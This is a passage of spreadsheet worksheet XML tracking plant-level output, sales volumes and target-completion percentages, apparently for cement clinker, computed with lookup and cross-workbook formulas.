      <c r="Y6" s="76"/>
    </row>
    <row r="7" customHeight="1" spans="2:25">
      <c r="B7" s="100" t="s">
        <v>283</v>
      </c>
      <c r="C7" s="96" t="s">
        <v>312</v>
      </c>
      <c r="D7" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!G22")</f>
        <v>6423</v>
      </c>
      <c r="E7" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!H22")</f>
        <v>45781</v>
      </c>
      <c r="F7" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!I22")</f>
        <v>2076762</v>
      </c>
      <c r="G7" s="102">
        <v>2115200</v>
      </c>
      <c r="H7" s="103">
        <f ca="1">$F$7/$G$7*100</f>
        <v>98.1827723146747</v>
      </c>
      <c r="I7" s="104">
        <f>VLOOKUP(C7&amp;"商品熟料",日销售量,(1+$T$4),FALSE)</f>
        <v>0</v>
      </c>
      <c r="J7" s="104">
        <f>VLOOKUP(C7&amp;"商品熟料",日销售量,(33),FALSE)</f>
        <v>473.78</v>
      </c>
      <c r="K7" s="104">
        <f>VLOOKUP(C7&amp;"商品熟料",日销售量,(34),FALSE)</f>
        <v>79794.63</v>
      </c>
      <c r="L7" s="104">
        <v>50000</v>
      </c>
      <c r="M7" s="105">
        <f>$K$7/$L$7*100</f>
        <v>159.58926</v>
      </c>
      <c r="N7" s="106">
        <f ca="1">INDIRECT($T$4&amp;"!G23")</f>
        <v>0</v>
      </c>
      <c r="O7" s="106">
        <f ca="1">INDIRECT($T$4&amp;"!H23")</f>
        <v>0</v>
      </c>
      <c r="P7" s="106">
        <f ca="1">INDIRECT($T$4&amp;"!I23")</f>
        <v>0</v>
      </c>
      <c r="Q7" s="107">
        <f ca="1">INDIRECT($T$4&amp;"!M22")+INDIRECT($T$4&amp;"!M23")+INDIRECT($T$4&amp;"!M24")</f>
        <v>186815.862</v>
      </c>
      <c r="R7" s="108">
        <f>ROUND('[10]31'!$L$70,0)</f>
        <v>0</v>
      </c>
      <c r="S7" s="107">
        <f ca="1">Q7-R7</f>
        <v>186815.862</v>
      </c>
      <c r="T7" s="109">
        <f>5.5+15+0.7</f>
        <v>21.2</v>
      </c>
      <c r="U7" s="110">
        <f ca="1">(Q7-X3)/T7*100/10000</f>
        <v>88.1206896226415</v>
      </c>
      <c r="W7" s="111" t="s">
        <v>349</v>
      </c>
      <c r="X7" s="75">
        <f>ROUND('[14]31'!$T$44,0)</f>
        <v>0</v>
      </c>
      <c r="Y7" s="76">
        <v>0</v>
      </c>
    </row>
    <row r="8" customHeight="1" spans="2:25">
      <c r="B8" s="112"/>
      <c r="C8" s="96" t="s">
        <v>350</v>
      </c>
      <c r="D8" s="101">
        <f>'[10]31'!$E$18</f>
        <v>0</v>
      </c>
      <c r="E8" s="101">
        <f>'[10]31'!$F$18</f>
        <v>62660</v>
      </c>
      <c r="F8" s="101">
        <f>'[10]31'!$G$18</f>
        <v>1409996</v>
      </c>
      <c r="G8" s="102">
        <v>1950000</v>
      </c>
      <c r="H8" s="103">
        <f>$F$8/$G$8*100</f>
        <v>72.3074871794872</v>
      </c>
      <c r="I8" s="113"/>
      <c r="J8" s="113"/>
      <c r="K8" s="113"/>
      <c r="L8" s="113"/>
      <c r="M8" s="114"/>
      <c r="N8" s="115"/>
      <c r="O8" s="115"/>
      <c r="P8" s="115"/>
      <c r="Q8" s="107">
        <f>'[10]31'!$L$18</f>
        <v>8980.837</v>
      </c>
      <c r="R8" s="116"/>
      <c r="S8" s="107">
        <f t="shared" ref="S8:S15" si="0">Q8-R8</f>
        <v>8980.837</v>
      </c>
      <c r="T8" s="109">
        <v>5.5</v>
      </c>
      <c r="U8" s="110">
        <f>(Q8)/T8*100/10000</f>
        <v>16.3287945454545</v>
      </c>
      <c r="V8" s="117"/>
      <c r="W8" s="118" t="s">
        <v>345</v>
      </c>
      <c r="X8" s="119">
        <f>SUM(X3:X7)</f>
        <v>41550</v>
      </c>
      <c r="Y8" s="118">
        <f>SUM(Y3:Y7)</f>
        <v>0</v>
      </c>
    </row>
    <row r="9" customHeight="1" spans="2:25">
      <c r="B9" s="112"/>
      <c r="C9" s="96" t="s">
        <v>351</v>
      </c>
      <c r="D9" s="101">
        <f>'[10]31'!$E$19</f>
        <v>0</v>
      </c>
      <c r="E9" s="101">
        <f>'[10]31'!$F$19</f>
        <v>0</v>
      </c>
      <c r="F9" s="101">
        <f>'[10]31'!$G$19</f>
        <v>683645</v>
      </c>
      <c r="G9" s="102">
        <v>165200</v>
      </c>
      <c r="H9" s="103">
        <f>$F$9/$G$9*100</f>
        <v>413.828692493947</v>
      </c>
      <c r="I9" s="120"/>
      <c r="J9" s="120"/>
      <c r="K9" s="120"/>
      <c r="L9" s="120"/>
      <c r="M9" s="121"/>
      <c r="N9" s="122"/>
      <c r="O9" s="122"/>
      <c r="P9" s="122"/>
      <c r="Q9" s="107">
        <f>'[10]31'!$L$19</f>
        <v>36556.605</v>
      </c>
      <c r="R9" s="123"/>
      <c r="S9" s="107">
        <f t="shared" si="0"/>
        <v>36556.605</v>
      </c>
      <c r="T9" s="109">
        <f>15+0.7</f>
        <v>15.7</v>
      </c>
      <c r="U9" s="110">
        <f>(Q9)/T9*100/10000</f>
        <v>23.2844617834395</v>
      </c>
      <c r="V9" s="124"/>
    </row>
    <row r="10" customHeight="1" spans="2:25">
      <c r="B10" s="112"/>
      <c r="C10" s="96" t="s">
        <v>352</v>
      </c>
      <c r="D10" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!G32")</f>
        <v>6348</v>
      </c>
      <c r="E10" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!H32")</f>
        <v>21092</v>
      </c>
      <c r="F10" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!I32")</f>
        <v>1548935</v>
      </c>
      <c r="G10" s="125">
        <v>2041000</v>
      </c>
      <c r="H10" s="126">
        <f ca="1">$F$10/$G$10*100</f>
        <v>75.890984811367</v>
      </c>
      <c r="I10" s="127">
        <f>VLOOKUP(C10&amp;"商品熟料",日销售量,(1+$T$4),FALSE)</f>
        <v>0</v>
      </c>
      <c r="J10" s="127">
        <f>VLOOKUP(C10&amp;"商品熟料",日销售量,(33),FALSE)</f>
        <v>0</v>
      </c>
      <c r="K10" s="127">
        <f>VLOOKUP(C10&amp;"商品熟料",日销售量,(34),FALSE)</f>
        <v>0</v>
      </c>
      <c r="L10" s="127">
        <v>0</v>
      </c>
      <c r="M10" s="128" t="e">
        <f>$K$8/$L$8*100</f>
        <v>#DIV/0!</v>
      </c>
      <c r="N10" s="129">
        <f ca="1">INDIRECT($T$4&amp;"!G33")</f>
        <v>0</v>
      </c>
      <c r="O10" s="129">
        <f ca="1">INDIRECT($T$4&amp;"!H33")</f>
        <v>0</v>
      </c>
      <c r="P10" s="129">
        <f ca="1">INDIRECT($T$4&amp;"!I33")</f>
        <v>0</v>
      </c>
      <c r="Q10" s="107">
        <f ca="1">INDIRECT($T$4&amp;"!M32")+INDIRECT($T$4&amp;"!M33")+INDIRECT($T$4&amp;"!M34")</f>
        <v>61342.616</v>
      </c>
      <c r="R10" s="107">
        <f>ROUND('[11]31'!$L$63,0)</f>
        <v>10467</v>
      </c>
      <c r="S10" s="107">
        <f ca="1" t="shared" si="0"/>
        <v>50875.616</v>
      </c>
      <c r="T10" s="130">
        <v>5.9</v>
      </c>
      <c r="U10" s="110">
        <f ca="1">(Q10-X4)/T10*100/10000</f>
        <v>86.2298576271186</v>
      </c>
      <c r="V10" s="124"/>
    </row>
    <row r="11" customHeight="1" spans="2:25">
      <c r="B11" s="112"/>
      <c r="C11" s="96" t="s">
        <v>348</v>
      </c>
      <c r="D11" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!G42")</f>
        <v>0</v>
      </c>
      <c r="E11" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!H42")</f>
        <v>0</v>
      </c>
      <c r="F11" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!I42")</f>
        <v>0</v>
      </c>
      <c r="G11" s="125">
        <v>0</v>
      </c>
      <c r="H11" s="126" t="e">
        <f ca="1">$F$11/$G$11*100</f>
        <v>#DIV/0!</v>
      </c>
      <c r="I11" s="127">
        <f>VLOOKUP(C11&amp;"商品熟料",日销售量,(1+$T$4),FALSE)</f>
        <v>0</v>
      </c>
      <c r="J11" s="127">
        <f>VLOOKUP(C11&amp;"商品熟料",日销售量,(33),FALSE)</f>
        <v>0</v>
      </c>
      <c r="K11" s="127">
        <f>VLOOKUP(C11&amp;"商品熟料",日销售量,(34),FALSE)</f>
        <v>0</v>
      </c>
      <c r="L11" s="127">
        <v>0</v>
      </c>
      <c r="M11" s="128" t="e">
        <f>$K$9/$L$9*100</f>
        <v>#DIV/0!</v>
      </c>
      <c r="N11" s="129">
        <f ca="1">INDIRECT($T$4&amp;"!G53")</f>
        <v>0</v>
      </c>
      <c r="O11" s="129">
        <f ca="1">INDIRECT($T$4&amp;"!H53")</f>
        <v>0</v>
      </c>
      <c r="P11" s="129">
        <f ca="1">INDIRECT($T$4&amp;"!I53")</f>
        <v>0</v>
      </c>
      <c r="Q11" s="107">
        <f ca="1">INDIRECT($T$4&amp;"!M42")+INDIRECT($T$4&amp;"!M43")+INDIRECT($T$4&amp;"!M44")</f>
        <v>65896.78</v>
      </c>
      <c r="R11" s="107">
        <f>ROUND('[12]31'!$L$54,0)</f>
        <v>31083</v>
      </c>
      <c r="S11" s="107">
        <f ca="1" t="shared" si="0"/>
        <v>34813.78</v>
      </c>
      <c r="T11" s="130">
        <f>5+0.15</f>
        <v>5.15</v>
      </c>
      <c r="U11" s="110">
        <f ca="1">(Q11-X6)/T11*100/10000</f>
        <v>67.599572815534</v>
      </c>
      <c r="V11" s="124"/>
    </row>
    <row r="12" customHeight="1" spans="2:25">
      <c r="B12" s="112"/>
      <c r="C12" s="96" t="s">
        <v>304</v>
      </c>
      <c r="D12" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!G52")</f>
        <v>2e-11</v>
      </c>
      <c r="E12" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!H52")</f>
        <v>1.4e-10</v>
      </c>
      <c r="F12" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!I52")</f>
        <v>1383567.25</v>
      </c>
      <c r="G12" s="102">
        <v>1852600</v>
      </c>
      <c r="H12" s="103">
        <f ca="1">$F$12/$G$12*100</f>
        <v>74.6824597862464</v>
      </c>
      <c r="I12" s="104">
        <f>VLOOKUP(C12&amp;"商品熟料",日销售量,(1+$T$4),FALSE)</f>
        <v>0</v>
      </c>
      <c r="J12" s="104">
        <f>VLOOKUP(C12&amp;"商品熟料",日销售量,(33),FALSE)</f>
        <v>9194.742</v>
      </c>
      <c r="K12" s="104">
        <f>VLOOKUP(C12&amp;"商品熟料",日销售量,(34),FALSE)</f>
        <v>44694.949</v>
      </c>
      <c r="L12" s="104">
        <v>50000</v>
      </c>
      <c r="M12" s="131">
        <f>$K$12/$L$12*100</f>
        <v>89.389898</v>
      </c>
      <c r="N12" s="106">
        <f ca="1">INDIRECT($T$4&amp;"!G63")</f>
        <v>0</v>
      </c>
      <c r="O12" s="106">
        <f ca="1">INDIRECT($T$4&amp;"!H63")</f>
        <v>0</v>
      </c>
      <c r="P12" s="106">
        <f ca="1">INDIRECT($T$4&amp;"!I63")</f>
        <v>0</v>
      </c>
      <c r="Q12" s="107">
        <f ca="1">INDIRECT($T$4&amp;"!M52")+INDIRECT($T$4&amp;"!M53")</f>
        <v>65006.5150000503</v>
      </c>
      <c r="R12" s="108">
        <f>ROUND('[13]31'!$L$67,0)</f>
        <v>0</v>
      </c>
      <c r="S12" s="107">
        <f ca="1" t="shared" si="0"/>
        <v>65006.5150000503</v>
      </c>
      <c r="T12" s="109">
        <f>1.8+0.3+12+1.5+0.26*3+0.26</f>
        <v>16.64</v>
      </c>
      <c r="U12" s="110">
        <f ca="1">(Q12-X5)/T12*100/10000</f>
        <v>39.0664152644533</v>
      </c>
      <c r="V12" s="117"/>
    </row>
    <row r="13" customHeight="1" spans="2:25">
      <c r="B13" s="112"/>
      <c r="C13" s="96" t="s">
        <v>353</v>
      </c>
      <c r="D13" s="101">
        <f>'[13]31'!$E$20</f>
        <v>1e-11</v>
      </c>
      <c r="E13" s="101">
        <f>'[13]31'!$F$20</f>
        <v>3.1e-10</v>
      </c>
      <c r="F13" s="101">
        <f>'[13]31'!$G$20</f>
        <v>3.41e-9</v>
      </c>
      <c r="G13" s="102">
        <v>0</v>
      </c>
      <c r="H13" s="103" t="e">
        <f>$F$13/$G$13*100</f>
        <v>#DIV/0!</v>
      </c>
      <c r="I13" s="113"/>
      <c r="J13" s="113"/>
      <c r="K13" s="113"/>
      <c r="L13" s="113"/>
      <c r="M13" s="132"/>
      <c r="N13" s="115"/>
      <c r="O13" s="115"/>
      <c r="P13" s="115"/>
      <c r="Q13" s="107">
        <f>'[13]31'!$Y$92</f>
        <v>4206.04</v>
      </c>
      <c r="R13" s="116"/>
      <c r="S13" s="107">
        <f t="shared" si="0"/>
        <v>4206.04</v>
      </c>
      <c r="T13" s="109">
        <f>1.8+0.3</f>
        <v>2.1</v>
      </c>
      <c r="U13" s="110">
        <f>Q13/T13*100/10000</f>
        <v>20.0287619047619</v>
      </c>
    </row>
    <row r="14" customHeight="1" spans="2:25">
      <c r="B14" s="112"/>
      <c r="C14" s="96" t="s">
        <v>354</v>
      </c>
      <c r="D14" s="101">
        <f>'[13]31'!$E$21</f>
        <v>5548.73000000001</v>
      </c>
      <c r="E14" s="101">
        <f>'[13]31'!$F$21</f>
        <v>59740.1700000003</v>
      </c>
      <c r="F14" s="101">
        <f>'[13]31'!$G$21</f>
        <v>1443307.42</v>
      </c>
      <c r="G14" s="102">
        <v>1852600</v>
      </c>
      <c r="H14" s="103">
        <f>$F$14/$G$14*100</f>
        <v>77.9071262010149</v>
      </c>
      <c r="I14" s="113"/>
      <c r="J14" s="113"/>
      <c r="K14" s="113"/>
      <c r="L14" s="113"/>
      <c r="M14" s="132"/>
      <c r="N14" s="122"/>
      <c r="O14" s="122"/>
      <c r="P14" s="122"/>
      <c r="Q14" s="107">
        <f>'[13]31'!$Y$93</f>
        <v>24935.7550000508</v>
      </c>
      <c r="R14" s="116"/>
      <c r="S14" s="107">
        <f t="shared" si="0"/>
        <v>24935.7550000508</v>
      </c>
      <c r="T14" s="109">
        <f>12+1.5</f>
        <v>13.5</v>
      </c>
      <c r="U14" s="110">
        <f>(Q14)/T14*100/10000</f>
        <v>18.4709296296673</v>
      </c>
    </row>
    <row r="15" s="71" customFormat="1" customHeight="1" spans="2:25">
      <c r="B15" s="112"/>
      <c r="C15" s="135" t="s">
        <v>355</v>
      </c>
      <c r="D15" s="101"/>
      <c r="E15" s="101"/>
      <c r="F15" s="101"/>
      <c r="G15" s="102"/>
      <c r="H15" s="103"/>
      <c r="I15" s="120"/>
      <c r="J15" s="120"/>
      <c r="K15" s="120"/>
      <c r="L15" s="120"/>
      <c r="M15" s="136"/>
      <c r="N15" s="137"/>
      <c r="O15" s="137"/>
      <c r="P15" s="137"/>
      <c r="Q15" s="107">
        <f>'[13]31'!$Y$94</f>
        <v>7000</v>
      </c>
      <c r="R15" s="123"/>
      <c r="S15" s="107">
        <f t="shared" si="0"/>
        <v>7000</v>
      </c>
      <c r="T15" s="109">
        <f>0.26*3+0.26</f>
        <v>1.04</v>
      </c>
      <c r="U15" s="110">
        <f>(Q15)/T15*100/10000</f>
        <v>67.3076923076923</v>
      </c>
      <c r="V15" s="72"/>
      <c r="W15" s="72"/>
      <c r="X15" s="72"/>
      <c r="Y15" s="72"/>
    </row>
    <row r="16" customHeight="1" spans="2:25">
      <c r="B16" s="112"/>
      <c r="C16" s="96" t="s">
        <v>345</v>
      </c>
      <c r="D16" s="138">
        <f ca="1">SUM(D10:D12)+D7</f>
        <v>12771</v>
      </c>
      <c r="E16" s="138">
        <f ca="1">SUM(E10:E12)+E7</f>
        <v>66873.0000000001</v>
      </c>
      <c r="F16" s="138">
        <f ca="1">SUM(F10:F12)+F7</f>
        <v>5009264.25</v>
      </c>
      <c r="G16" s="139">
        <f>SUM(G10:G12)+G7</f>
        <v>6008800</v>
      </c>
      <c r="H16" s="140">
        <f ca="1">$F$16/$G$16*100</f>
        <v>83.3654681467181</v>
      </c>
      <c r="I16" s="141">
        <f>SUM(I7:I12)</f>
        <v>0</v>
      </c>
      <c r="J16" s="141">
        <f>SUM(J7:J12)</f>
        <v>9668.522</v>
      </c>
      <c r="K16" s="141">
        <f>SUM(K7:K12)</f>
        <v>124489.579</v>
      </c>
      <c r="L16" s="141">
        <f>SUM(L7:L12)</f>
        <v>100000</v>
      </c>
      <c r="M16" s="142">
        <f>$K$16/$L$16*100</f>
        <v>124.489579</v>
      </c>
      <c r="N16" s="143">
        <f ca="1">SUM(N7:N12)+N19</f>
        <v>0</v>
      </c>
      <c r="O16" s="143">
        <f ca="1">SUM(O7:O12)+O19</f>
        <v>0</v>
      </c>
      <c r="P16" s="143">
        <f ca="1">SUM(P7:P12)+P19</f>
        <v>0</v>
      </c>
      <c r="Q16" s="144">
        <f ca="1">SUM(Q7:Q12)-Q8-Q9</f>
        <v>379061.77300005</v>
      </c>
      <c r="R16" s="144">
        <f>R7+R10+R11+R12+R17</f>
        <v>41550</v>
      </c>
      <c r="S16" s="144">
        <f ca="1">SUM(S7:S12)-S8-S9</f>
        <v>337511.77300005</v>
      </c>
      <c r="T16" s="145">
        <f>SUM(T7:T12)-T8-T9</f>
        <v>48.89</v>
      </c>
      <c r="U16" s="146">
        <f ca="1">(Q16-X3-X4-X5-X6)/T16*100/10000</f>
        <v>69.0349300470547</v>
      </c>
    </row>
    <row r="17" customHeight="1" spans="2:27">
      <c r="B17" s="112"/>
      <c r="C17" s="96" t="s">
        <v>349</v>
      </c>
      <c r="D17" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!G62")+INDIRECT($T$4&amp;"!G63")</f>
        <v>1206</v>
      </c>
      <c r="E17" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!h62")+INDIRECT($T$4&amp;"!h63")</f>
        <v>14740</v>
      </c>
      <c r="F17" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!I62")+INDIRECT($T$4&amp;"!I63")</f>
        <v>850733.456</v>
      </c>
      <c r="G17" s="125"/>
      <c r="H17" s="126"/>
      <c r="I17" s="147"/>
      <c r="J17" s="147"/>
      <c r="K17" s="147"/>
      <c r="L17" s="147"/>
      <c r="M17" s="148"/>
      <c r="N17" s="149">
        <f ca="1">INDIRECT($T$4&amp;"!G73")</f>
        <v>0</v>
      </c>
      <c r="O17" s="149">
        <f ca="1">INDIRECT($T$4&amp;"!H73")</f>
        <v>0</v>
      </c>
      <c r="P17" s="149">
        <f ca="1">INDIRECT($T$4&amp;"!I73")</f>
        <v>0</v>
      </c>
      <c r="Q17" s="107">
        <f ca="1">INDIRECT($T$4&amp;"!M62")+INDIRECT($T$4&amp;"!M63")</f>
        <v>15474.634</v>
      </c>
      <c r="R17" s="107">
        <f>ROUND('[14]31'!$T$44,0)</f>
        <v>0</v>
      </c>
      <c r="S17" s="107">
        <f ca="1">Q17-R17</f>
        <v>15474.634</v>
      </c>
      <c r="T17" s="130">
        <f>2.8-0.3</f>
        <v>2.5</v>
      </c>
      <c r="U17" s="110">
        <f ca="1">(Q17-X7)/T17*100/10000</f>
        <v>61.898536</v>
      </c>
    </row>
    <row r="18" customHeight="1" spans="2:27">
      <c r="B18" s="112"/>
      <c r="C18" s="96" t="s">
        <v>321</v>
      </c>
      <c r="D18" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!G69")+INDIRECT($T$4&amp;"!G70")</f>
        <v>0</v>
      </c>
      <c r="E18" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!h69")+INDIRECT($T$4&amp;"!h70")</f>
        <v>0</v>
      </c>
      <c r="F18" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!I69")+INDIRECT($T$4&amp;"!I70")</f>
        <v>0</v>
      </c>
      <c r="G18" s="125"/>
      <c r="H18" s="126"/>
      <c r="I18" s="147"/>
      <c r="J18" s="147"/>
      <c r="K18" s="147"/>
      <c r="L18" s="147"/>
      <c r="M18" s="148"/>
      <c r="N18" s="149"/>
      <c r="O18" s="149"/>
      <c r="P18" s="149"/>
      <c r="Q18" s="107">
        <f ca="1">INDIRECT($T$4&amp;"!M69")+INDIRECT($T$4&amp;"!M70")</f>
        <v>467.66</v>
      </c>
      <c r="R18" s="107"/>
      <c r="S18" s="107"/>
      <c r="T18" s="130">
        <v>5</v>
      </c>
      <c r="U18" s="110">
        <f ca="1">(Q18)/T18*100/10000</f>
        <v>0.93532</v>
      </c>
    </row>
    <row r="19" customHeight="1" spans="2:27">
      <c r="B19" s="112"/>
      <c r="C19" s="96" t="s">
        <v>356</v>
      </c>
      <c r="D19" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!G80")</f>
        <v>0</v>
      </c>
      <c r="E19" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!H80")</f>
        <v>0</v>
      </c>
      <c r="F19" s="101">
        <f ca="1">INDIRECT($T$4&amp;"!I80")</f>
        <v>0</v>
      </c>
      <c r="G19" s="102"/>
      <c r="H19" s="103"/>
      <c r="I19" s="120"/>
      <c r="J19" s="120"/>
      <c r="K19" s="120"/>
      <c r="L19" s="120">
        <v>0</v>
      </c>
      <c r="M19" s="128" t="e">
        <f>$K$8/$L$8*100</f>
        <v>#DIV/0!</v>
      </c>
      <c r="N19" s="122"/>
      <c r="O19" s="122"/>
      <c r="P19" s="122"/>
      <c r="Q19" s="107">
        <f ca="1">INDIRECT($T$4&amp;"!M80")</f>
        <v>0</v>
      </c>
      <c r="R19" s="150"/>
      <c r="S19" s="107">
        <f ca="1">Q19</f>
        <v>0</v>
      </c>
      <c r="T19" s="109">
        <v>10</v>
      </c>
      <c r="U19" s="110">
        <f ca="1">(Q19)/T19*100/10000</f>
        <v>0</v>
      </c>
    </row>
    <row r="20" customHeight="1" spans="2:27">
      <c r="B20" s="100" t="s">
        <v>357</v>
      </c>
      <c r="C20" s="96" t="s">
        <v>312</v>
      </c>
      <c r="D20" s="151">
        <f ca="1">D21+D22</f>
        <v>8393.46</v>
      </c>
      <c r="E20" s="151">
        <f ca="1" t="shared" ref="E20:K20" si="1">E21+E22</f>
        <v>55479.52</v>
      </c>
      <c r="F20" s="151">
        <f ca="1" t="shared" si="1"/>
        <v>2312045.99</v>
      </c>
      <c r="G20" s="151">
        <v>2320000</v>
      </c>
      <c r="H20" s="152">
        <f ca="1">$F$20/$G$20*100</f>
        <v>99.6571547413793</v>
      </c>
      <c r="I20" s="147">
        <f t="shared" si="1"/>
        <v>7623.84</v>
      </c>
      <c r="J20" s="147">
        <f t="shared" si="1"/>
        <v>247973.89</v>
      </c>
      <c r="K20" s="147">
        <f t="shared" si="1"/>
        <v>2321299.26</v>
      </c>
      <c r="L20" s="147">
        <v>2320000</v>
      </c>
      <c r="M20" s="148">
        <f>$K$20/$L$20*100</f>
        <v>100.056002586207</v>
      </c>
      <c r="N20" s="151">
        <f t="shared" ref="N20:Q20" si="2">N21+N22</f>
        <v>0</v>
      </c>
      <c r="O20" s="151">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="P20" s="151">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="Q20" s="107">
        <f ca="1" t="shared" si="2"/>
        <v>85289.47</v>
      </c>
      <c r="R20" s="107"/>
      <c r="S20" s="107"/>
      <c r="T20" s="130">
        <v>11.9</v>
      </c>
      <c r="U20" s="110">
        <f ca="1">Q20/T20*100/10000</f>
        <v>71.6718235294118</v>
      </c>
    </row>
    <row r="21" customHeight="1" spans="2:27">
      <c r="B21" s="112"/>
      <c r="C21" s="96" t="s">
        <v>358</v>
      </c>
      <c r="D21" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!G21")</f>
        <v>7828</v>
      </c>
      <c r="E21" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!H21")</f>
        <v>51795</v>
      </c>
      <c r="F21" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!I21")</f>
        <v>2161233</v>
      </c>
      <c r="G21" s="153">
        <v>2170000</v>
      </c>
      <c r="H21" s="152">
        <f ca="1">$F$21/$G$21*100</f>
        <v>99.5959907834101</v>
      </c>
      <c r="I21" s="147">
        <f>VLOOKUP("安砂",日销售量,(1+$T$4),FALSE)</f>
        <v>6884.84</v>
      </c>
      <c r="J21" s="147">
        <f>VLOOKUP("安砂",日销售量,(33),FALSE)</f>
        <v>232802.39</v>
      </c>
      <c r="K21" s="147">
        <f>VLOOKUP("安砂",日销售量,(34),FALSE)</f>
        <v>2163275.81</v>
      </c>
      <c r="L21" s="127">
        <v>2170000</v>
      </c>
      <c r="M21" s="148">
        <f>$K$21/$L$21*100</f>
        <v>99.6901294930876</v>
      </c>
      <c r="N21" s="154"/>
      <c r="O21" s="154"/>
      <c r="P21" s="154"/>
      <c r="Q21" s="107">
        <f ca="1">INDIRECT($T$4&amp;"!M21")</f>
        <v>80528.67</v>
      </c>
      <c r="R21" s="155" t="s">
        <v>359</v>
      </c>
      <c r="S21" s="155" t="s">
        <v>360</v>
      </c>
      <c r="T21" s="130">
        <f>4.6+(0.6*8+1.2)+0.05*5+0.1</f>
        <v>10.95</v>
      </c>
      <c r="U21" s="110">
        <f ca="1">Q21/T21*100/10000</f>
        <v>73.5421643835617</v>
      </c>
    </row>
    <row r="22" customHeight="1" spans="2:27">
      <c r="B22" s="112"/>
      <c r="C22" s="96" t="s">
        <v>361</v>
      </c>
      <c r="D22" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!G79")</f>
        <v>565.46</v>
      </c>
      <c r="E22" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!H79")</f>
        <v>3684.52</v>
      </c>
      <c r="F22" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!I79")</f>
        <v>150812.99</v>
      </c>
      <c r="G22" s="153">
        <v>150000</v>
      </c>
      <c r="H22" s="152">
        <f ca="1">$F$22/$G$22*100</f>
        <v>100.541993333333</v>
      </c>
      <c r="I22" s="147">
        <f>VLOOKUP("安砂德化",日销售量,(1+$T$4),FALSE)</f>
        <v>739</v>
      </c>
      <c r="J22" s="147">
        <f>VLOOKUP("安砂德化",日销售量,(33),FALSE)</f>
        <v>15171.5</v>
      </c>
      <c r="K22" s="147">
        <f>VLOOKUP("安砂德化",日销售量,(34),FALSE)</f>
        <v>158023.45</v>
      </c>
      <c r="L22" s="127">
        <v>150000</v>
      </c>
      <c r="M22" s="148">
        <f>$K$22/$L$22*100</f>
        <v>105.348966666667</v>
      </c>
      <c r="N22" s="154"/>
      <c r="O22" s="154"/>
      <c r="P22" s="154"/>
      <c r="Q22" s="107">
        <f ca="1">INDIRECT($T$4&amp;"!M79")</f>
        <v>4760.8</v>
      </c>
      <c r="R22" s="155" t="s">
        <v>229</v>
      </c>
      <c r="S22" s="155">
        <f>'31'!Z38+'31'!Z37</f>
        <v>7357.671</v>
      </c>
      <c r="T22" s="130">
        <v>0.9</v>
      </c>
      <c r="U22" s="110">
        <f ca="1">Q22/T22*100/10000</f>
        <v>52.8977777777778</v>
      </c>
    </row>
    <row r="23" customHeight="1" spans="2:27">
      <c r="B23" s="112"/>
      <c r="C23" s="96" t="s">
        <v>352</v>
      </c>
      <c r="D23" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!G31")</f>
        <v>2904</v>
      </c>
      <c r="E23" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!H31")</f>
        <v>25754</v>
      </c>
      <c r="F23" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!I31")</f>
        <v>1398761</v>
      </c>
      <c r="G23" s="153">
        <v>1820000</v>
      </c>
      <c r="H23" s="152">
        <f ca="1">$F$23/$G$23*100</f>
        <v>76.855</v>
      </c>
      <c r="I23" s="147">
        <f t="shared" ref="I23:I26" si="3">VLOOKUP(C23,日销售量,(1+$T$4),FALSE)</f>
        <v>6130.55</v>
      </c>
      <c r="J23" s="147">
        <f t="shared" ref="J23:J27" si="4">VLOOKUP(C23,日销售量,(33),FALSE)</f>
        <v>153523.14</v>
      </c>
      <c r="K23" s="147">
        <f t="shared" ref="K23:K27" si="5">VLOOKUP(C23,日销售量,(34),FALSE)</f>
        <v>1520294.32</v>
      </c>
      <c r="L23" s="127">
        <v>1820000</v>
      </c>
      <c r="M23" s="148">
        <f>$K$23/$L$23*100</f>
        <v>83.5326549450549</v>
      </c>
      <c r="N23" s="154"/>
      <c r="O23" s="154"/>
      <c r="P23" s="154"/>
      <c r="Q23" s="107">
        <f ca="1">INDIRECT($T$4&amp;"!M31")</f>
        <v>55590.12</v>
      </c>
      <c r="R23" s="155" t="s">
        <v>237</v>
      </c>
      <c r="S23" s="155">
        <f>'31'!Z42+'31'!Z41</f>
        <v>4725.137</v>
      </c>
      <c r="T23" s="130">
        <f>7.862</f>
        <v>7.862</v>
      </c>
      <c r="U23" s="110">
        <f ca="1" t="shared" ref="U23:U28" si="6">Q23/T23*100/10000</f>
        <v>70.7073518188756</v>
      </c>
    </row>
    <row r="24" customHeight="1" spans="2:27">
      <c r="B24" s="112"/>
      <c r="C24" s="96" t="s">
        <v>304</v>
      </c>
      <c r="D24" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!G51")</f>
        <v>4741</v>
      </c>
      <c r="E24" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!H51")</f>
        <v>41009.81</v>
      </c>
      <c r="F24" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!I51")</f>
        <v>1417408.81</v>
      </c>
      <c r="G24" s="153">
        <v>2180000</v>
      </c>
      <c r="H24" s="152">
        <f ca="1">$F$24/$G$24*100</f>
